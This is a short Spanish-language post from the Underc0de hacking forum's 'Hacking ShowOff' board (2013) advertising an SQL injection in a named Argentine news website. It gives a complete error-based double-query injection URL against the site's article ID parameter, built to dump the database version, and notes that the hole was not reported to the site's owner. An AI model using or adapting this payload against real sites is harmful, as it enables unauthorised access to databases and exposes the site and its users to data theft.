Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Julio 25, 2013, 11:49:48 PM

Título: SQL Double Query http://www.agenciasuburbana.com.ar
Publicado por: Muppet en Julio 25, 2013, 11:49:48 PM
(http://i44.tinypic.com/ngawya.png)

SQLI

Vector: http://www.agenciasuburbana.com.ar/noticia.php?id=11981 and(select 1 from(select count(*),concat((version()),floor(rand(0)*2))a from information_schema.tables group by a)b)--+
Reportado: No